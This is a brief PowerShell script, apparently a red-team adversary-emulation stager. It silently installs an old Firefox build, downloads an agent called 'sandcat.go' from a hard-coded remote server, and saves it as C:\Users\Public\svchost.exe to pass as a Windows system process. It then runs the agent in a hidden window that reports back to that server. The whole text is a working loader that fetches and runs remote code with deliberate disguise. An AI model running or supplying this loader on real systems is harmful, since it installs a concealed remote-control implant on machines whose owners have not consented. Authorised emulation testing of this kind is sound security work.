Invoke-WebRequest -Uri “https://download.mozilla.org/?product=firefox-51.0.1-SSL&os=win64&lang=en-US" -OutFile c:\firefox.exe; Start-Process -FilePath c:\firefox.exe -Args “/s” -Verb RunAs -Wait;
$server="http://34.201.137.10:8888";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$data=$wc.DownloadData($url);
get-process | ? {$_.modules.filename -like "C:\Users\Public\svchost.exe"} | stop-process -f;
rm -force "C:\Users\Public\svchost.exe" -ea ignore;
[io.file]::WriteAllBytes("C:\Users\Public\svchost.exe",$data) | Out-Null;
Start-Process -FilePath C:\Users\Public\svchost.exe -ArgumentList "-server $server -group red" -WindowStyle hidden;
